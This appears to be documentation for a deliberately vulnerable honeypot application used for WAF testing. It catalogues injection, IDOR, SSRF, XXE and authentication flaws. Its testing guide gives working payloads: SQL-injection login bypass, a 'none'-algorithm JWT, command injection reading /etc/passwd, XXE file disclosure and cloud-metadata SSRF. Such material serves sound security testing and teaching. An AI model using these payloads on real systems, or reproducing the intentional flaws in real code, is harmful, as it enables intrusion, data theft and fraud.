Chimera Vulnerability Inventory
Chimera Vulnerability Inventory
This application contains intentional security vulnerabilities for WAF testing. NEVER deploy to production or expose to the internet without proper WAF protection.
Overview
The Chimera application (vuln-api) is a Starlette/uvicorn honeypot designed
for WAF testing and security education. The formal vulnerability source of truth
is apps/vuln-api/app/utils/vuln_registry.py, which currently registers 29
CHM-ID vulnerabilities. Broader endpoint-level and code-pattern findings still
exist in the application, but they are being reconciled under TASK-17 before
this inventory treats them as counted catalog entries.
Quick Statistics
Registry Reconciliation Status
TASK-17 found that older documentation overstated the structured catalog by
describing “200+” vulnerabilities while the registry exposes 29 CHM-ID entries.
This page now counts only registered entries. Unregistered but intentional
attack patterns remain visible in the codebase and examples below; they should
either be added to VULN_REGISTRY or kept out of counted inventory totals.
Known reconciliation gaps:
CHM-BANK-001referencesPOST /api/v1/banking/transfer, which is not a live route in the current banking blueprint.CHM-SAAS-002referencesPUT /api/v1/saas/tenants/{tenant_id}; the closest live route is the tenant settings endpoint.database_vulnerable/routes.pycontains eight explicit SQL injection routes but no CHM-ID registry entries yet.- Only
CHM-BANK-002currently has assertedX-Chimera-Vuln-IDhotpatch tests; most registered vulnerabilities still need test coverage that asserts exploitability directly.
Vulnerability Categories
Registered Security Flaws
| Category | Registered count | Examples |
|---|---|---|
| Broken Access Control / IDOR | 13 | Cross-tenant SaaS access, medical record IDOR, subscriber/profile IDOR |
| Injection | 7 | SQL injection, command injection, reflected XSS |
| Business Logic Flaws | 3 | Transfer manipulation, SIM swap, loyalty points manipulation |
| SSRF | 2 | Energy utility callbacks, diagnostic webhooks |
| Security Misconfiguration | 1 | XXE in legacy import behavior |
| LLM Prompt Injection | 1 | Direct/indirect GenAI prompt injection |
| LLM Insecure Output Handling | 1 | Agent browse SSRF behavior |
| LLM Sensitive Information Disclosure | 1 | Model configuration exposure |
Registered CHM-ID Catalog
| ID | Severity | Portal | Endpoint | Name |
|---|---|---|---|---|
CHM-BANK-001 |
critical | banking | POST /api/v1/banking/transfer |
Business Logic Manipulation (Transfer) |
CHM-BANK-002 |
high | banking | GET /api/v1/banking/accounts |
BOLA / IDOR (Accounts) |
CHM-HEALTH-001 |
critical | healthcare | GET /api/v1/healthcare/records/search?q= |
SQL Injection (Search) |
CHM-HEALTH-002 |
high | healthcare | GET /api/v1/healthcare/records/{record_id} |
Broken Object Level Authorization (BOLA/IDOR) |
CHM-HEALTH-003 |
high | healthcare | GET /api/v1/healthcare/records |
PHI Data Exposure |
CHM-ECOM-001 |
high | ecommerce | GET /api/v1/ecommerce/products/search?query= |
Reflected XSS (Search) |
CHM-ECOM-002 |
critical | ecommerce | GET /api/v1/ecommerce/products |
SQL Injection (Catalog) |
CHM-SAAS-001 |
critical | saas | GET /api/v1/saas/tenants/{tenant_id}/projects |
Cross-Tenant IDOR |
CHM-SAAS-002 |
high | saas | PUT /api/v1/saas/tenants/{tenant_id} |
Mass Assignment (Tenant Profile) |
CHM-GOV-001 |
critical | government | GET /api/v1/gov/benefits/search?q= |
SQL Injection (Benefits Search) |
CHM-GOV-002 |
high | government | GET /api/v1/gov/benefits/search |
PII Exposure (Search Results) |
CHM-TELCO-001 |
high | telecom | GET /api/v1/telecom/subscribers/{subscriber_id}/profile |
BOLA / IDOR (Subscriber Profile) |
CHM-TELCO-002 |
critical | telecom | POST /api/v1/telecom/subscribers/{subscriber_id}/sim-swap |
Broken Business Logic (SIM Swap) |
CHM-ENERGY-001 |
high | energy_utilities | POST /api/v1/energy-utilities/assets/calibration |
Server-Side Request Forgery (SSRF) |
CHM-ENERGY-002 |
medium | energy_utilities | GET /api/v1/energy-utilities/outages/{outage_id} |
BOLA / IDOR (Outages) |
CHM-ICS-001 |
critical | ics_ot | POST /api/ot/protocols/modbus |
Remote Command Injection (Modbus) |
CHM-ICS-002 |
high | ics_ot | GET /api/ics/controllers/status |
BOLA / IDOR (Controller Status) |
CHM-ICS-003 |
medium | ics_ot | GET /api/ics/scada/systems |
Unauthorized System Discovery |
CHM-INS-001 |
high | insurance | GET /api/v1/insurance/policies/{policy_id} |
BOLA / IDOR (Policies) |
CHM-INS-002 |
critical | insurance | GET /api/v1/insurance/claims/search?q= |
SQL Injection (Claims Search) |
CHM-LOYAL-001 |
critical | loyalty | POST /api/loyalty/points/transfer |
Business Logic Manipulation (Points) |
CHM-LOYAL-002 |
high | loyalty | GET /api/loyalty/transactions/export?customer_id= |
BOLA / IDOR (Transactions) |
CHM-ADMIN-001 |
critical | admin | POST /api/v1/diagnostics/ping |
Remote Command Execution (Ping) |
CHM-ADMIN-002 |
high | admin | POST /api/v1/diagnostics/webhook |
Server-Side Request Forgery (Webhook) |
CHM-ADMIN-003 |
high | admin | POST /api/v1/admin/attack/xxe |
XML External Entity (Legacy Import) |
CHM-AI-001 |
critical | genai | POST /api/v1/genai/chat |
Prompt Injection (Direct/Indirect) |
CHM-AI-002 |
critical | genai | POST /api/v1/genai/agent/browse |
Server-Side Request Forgery (SSRF) via Agent |
CHM-AI-003 |
high | genai | GET /api/v1/genai/models/config |
Sensitive Data Exposure (Model Config) |
CHM-AI-004 |
high | genai | POST /api/v1/genai/knowledge/upload |
Unrestricted File Upload (RAG) |
Authentication & Authorization Vulnerabilities
Critical Authentication Flaws
JWT Vulnerabilities
POST /api/v1/auth/login
X-JWT-Algorithm: none
- Algorithm Confusion: Accepts “none” algorithm
- Unsigned Tokens: Base64-only tokens accepted
- No Signature Verification: Complete bypass possible
SQL Injection Login Bypass
curl -X POST http://localhost:8080/api/v1/auth/login \
-d '{"username":"admin'\'' OR '\''1'\''='\''1","password":"any"}'
- Direct string concatenation in queries
- Returns admin privileges without password
Token Forgery Endpoint
POST /api/oauth/token/forge
- Generates valid JWT for any user
- No authentication required
- Complete authentication bypass
Weak Cryptography
| Vulnerability | Endpoints | Details |
|---|---|---|
| MD5 Password Hashing | /auth/login, /auth/register |
Rainbow table attacks possible |
| Predictable Tokens | /auth/forgot, /auth/reset |
MD5(email+timestamp) |
| Weak Session IDs | /auth/login |
MD5(timestamp) |
| Predictable API Keys | /auth/apikeys/create |
MD5(user_id+timestamp) |
| Weak TOTP Secrets | /auth/mfa/enable |
MD5(user_id)[:16] |
Timing Attacks
# Valid user: 0.15s delay
# Invalid user: 0.05s delay
- User enumeration via response time
- Applies to:
/auth/login,/auth/forgot
Banking & Financial Vulnerabilities
Critical Financial Flaws
Race Condition in Transfers
POST /api/v1/banking/transfer
# Check balance
if source_balance >= amount:
time.sleep(0.001) # Race window
# Deduct from source
# Add to destination
- Non-atomic transactions
- Double-spend possible
- Concurrent transfers can overdraw
Balance Manipulation
POST /api/v1/banking/internal/reset-balance
{
"account_id": "any-account",
"new_balance": 1000000
}
- No authentication required
- Arbitrary balance setting
- Financial fraud enabled
Transaction Vulnerabilities
| Endpoint | Vulnerability | Impact |
|---|---|---|
/banking/accounts |
IDOR | View any user’s accounts |
/banking/transactions |
IDOR | View any account’s transactions |
/banking/statements |
IDOR | Download any account’s statements |
/banking/transfer/bulk |
No atomicity | Partial transfer failures |
/banking/accounts/enumerate |
Account enumeration | Reconnaissance |
Payment Processing Flaws
Capture Exceeds Authorization
POST /api/v1/payments/capture
{
"authorization_id": "auth_123",
"capture_amount": 10000 // Authorized: 100
}
Returns: "overage": 9900
Refund Exceeds Original
POST /api/v1/payments/refund
{
"transaction_id": "txn_123",
"refund_amount": 10000 // Original: 100
}
- Money laundering possible
- No validation on amounts
Healthcare & HIPAA Violations
Critical PHI Exposure
Mass Medical Records Export
GET /api/v1/healthcare/records
Returns ALL records with:
- SSN, DOB, diagnosis
- Medications, allergies
- Insurance information
- No authentication required
Genetic Data Exposure
GET /api/medical/genetics/profiles
Exposes:
- BRCA1/2 cancer risk genes
- APOE4 Alzheimer’s risk
- Pharmacogenomics data
- Ancestry information
- Discrimination risk: Employment, insurance
Mental Health Records
GET /api/medical/mental-health/sessions
Exposes:
- Therapy session notes
- Psychiatric diagnoses
- Risk assessments (suicide, self-harm)
- Medications prescribed
Controlled Substances
DEA Schedule II-IV Exposure
GET /api/v1/healthcare/prescriptions
Returns:
- Oxycodone, Hydrocodone (Schedule II)
- Alprazolam (Schedule IV)
- Adderall (Schedule II)
- Provider DEA numbers
- Prescription fraud risk
HIPAA Compliance Violations
| Violation | Endpoint | Details |
|---|---|---|
| Audit Log Tampering | /api/hipaa/audit-logs |
Can delete/modify audit trails |
| Unencrypted PHI Transfer | /api/hipaa/transfer/encrypted |
Returns encryption: none |
| Bulk PHI Export | /api/hipaa/export/bulk |
Mass data exfiltration |
| No Access Controls | All healthcare endpoints | No authentication/authorization |
Admin & System Vulnerabilities
Remote Code Execution
Direct Command Execution
POST /api/v1/admin/execute
{
"command": "cat /etc/passwd"
}
- No input validation
- Full system compromise
- No authorization required
Command Injection
POST /api/v1/admin/backup
{
"backup_path": "/tmp; cat /etc/passwd"
}
- Via backup operations
- Detects:
;,|,&,$,`
Privilege Escalation
Elevate Any User to Admin
POST /api/v1/admin/users/{user_id}/elevate
- No authentication check
- Self-elevation possible
- Complete access control bypass
Configuration Exposure
GET /api/v1/admin/config
Returns:
- Database credentials
- AWS access keys
- Stripe API keys
- JWT secrets
- Encryption keys
System Information Disclosure
GET /api/system/version
Exposes:
- Application version
- Python version
- Starlette / uvicorn version
- OS information
- CVE reconnaissance enabled
Advanced Attack Vectors
XXE Injection
POST /api/hipaa/system/configuration
Content-Type: application/xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>&xxe;</config>
- File disclosure
- SSRF possible
- Configuration endpoint
SSRF Vulnerabilities
POST /api/hipaa/transfer/encrypted
{
"destination": "http://169.254.169.254/latest/meta-data/"
}
- Cloud metadata access
- Internal network scanning
- Credential harvesting
Insecure Deserialization
POST /api/admin/attack/deserialize
{
"data": "base64_pickle_payload"
}
- Python pickle exploitation
- Remote code execution
- Command execution
Attack Simulation Endpoints
The application includes an entire attack simulation blueprint with:
Reconnaissance
/api/recon/advanced- External services, tech stack/api/intelligence/gather- Executive data, credentials/api/employees/directory- All employee emails/roles/api/technologies/stack- Complete tech disclosure
Exploitation
/api/lateral/movement- Network traversal paths/api/privilege/escalation- Exploit simulation/api/credentials/harvest- Plaintext passwords/api/vulnerabilities/scan- CVE findings
Persistence
/api/persistence/establish- Scheduled tasks/api/backdoors/install- DNS tunneling, covert channels/api/domain/admin/impersonate- Kerberos tickets
Data Exfiltration
/api/exfiltration/channels- DNS/ICMP/steganography/api/communication/covert- C2 infrastructure/api/data/collect- Automated harvesting
OWASP Top 10 Coverage
| OWASP Category | Registered CHM-ID count | Examples |
|---|---|---|
| A01: Broken Access Control | 13 | BOLA, IDOR, excessive data exposure |
| A03: Injection | 7 | SQL, command, XSS |
| A04: Insecure Design | 3 | Business logic manipulation |
| A05: Security Misconfiguration | 1 | XXE legacy import behavior |
| A10: SSRF | 2 | Energy utility and diagnostic SSRF |
| LLM01: Prompt Injection | 1 | Direct/indirect prompt injection |
| LLM02: Insecure Output Handling | 1 | Agent browse behavior |
| LLM06: Sensitive Information Disclosure | 1 | Model configuration exposure |
Other OWASP categories are represented by endpoint examples and route behavior
elsewhere in the app, but they are not yet registered with CHM-IDs and should
not be counted as catalog coverage until TASK-17 adds or rejects them.
Compliance Violations
Regulatory Non-Compliance
| Regulation | Violations | Examples |
|---|---|---|
| HIPAA | Massive PHI exposure | No encryption, audit tampering, bulk export |
| PCI DSS | Card data mishandling | CVV references, excessive storage, weak crypto |
| GDPR | Privacy violations | Mass PII export, no consent, no access controls |
| SOX | Financial manipulation | Audit destruction, balance tampering |
| AML/KYC | Money laundering | Transaction structuring, insufficient verification |
Testing Guide
Quick Exploitation Examples
Authentication Bypass
# SQL Injection
curl -X POST http://localhost:8080/api/v1/auth/login \
-d '{"username":"admin'\'' OR '\''1'\''='\''1","password":"x"}'
# JWT None Algorithm
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ."
# Token Forgery
curl -X POST http://localhost:8080/api/oauth/token/forge
Data Exfiltration
# Export all users
curl http://localhost:8080/api/v1/admin/users/export
# Export medical records
curl http://localhost:8080/api/v1/healthcare/records
# Export genetic data
curl http://localhost:8080/api/medical/genetics/profiles
Remote Code Execution
# Direct command execution
curl -X POST http://localhost:8080/api/v1/admin/execute \
-d '{"command":"cat /etc/passwd"}'
# Command injection
curl -X POST http://localhost:8080/api/v1/admin/backup \
-d '{"backup_path":"/tmp; ls -la /"}'
Financial Fraud
# Reset account balance
curl -X POST http://localhost:8080/api/v1/banking/internal/reset-balance \
-d '{"account_id":"ACC001","new_balance":1000000}'
# Capture more than authorized
curl -X POST http://localhost:8080/api/v1/payments/capture \
-d '{"authorization_id":"auth_123","capture_amount":10000}'
Vulnerability Density by Module
Authentication
Admin
Healthcare
Banking
Payments
Usage Warning
This application is designed for security testing in isolated environments only. It contains real exploit code and should NEVER be deployed to production or exposed to the internet without proper WAF protection.
Safe Usage Guidelines
- Isolated Environment Only - Run in Docker/VM with no external access
- WAF Protection Required - Always run behind Chimera WAF for demos
- Regular Resets - Reset data frequently to prevent accumulation
- Access Control - Limit access to authorized security personnel
- No Real Data - Never use actual PII, PHI, or financial data
Related Documentation
- API Documentation - Complete API reference
- Endpoints Catalog - All endpoints with parameters
- Attack Simulation - Attack pattern reference
- Getting Started - Setup and configuration
Last Updated: June 2026 Registered Vulnerabilities: 29 CHM-ID entries Broader unregistered attack surface: under TASK-17 reconciliation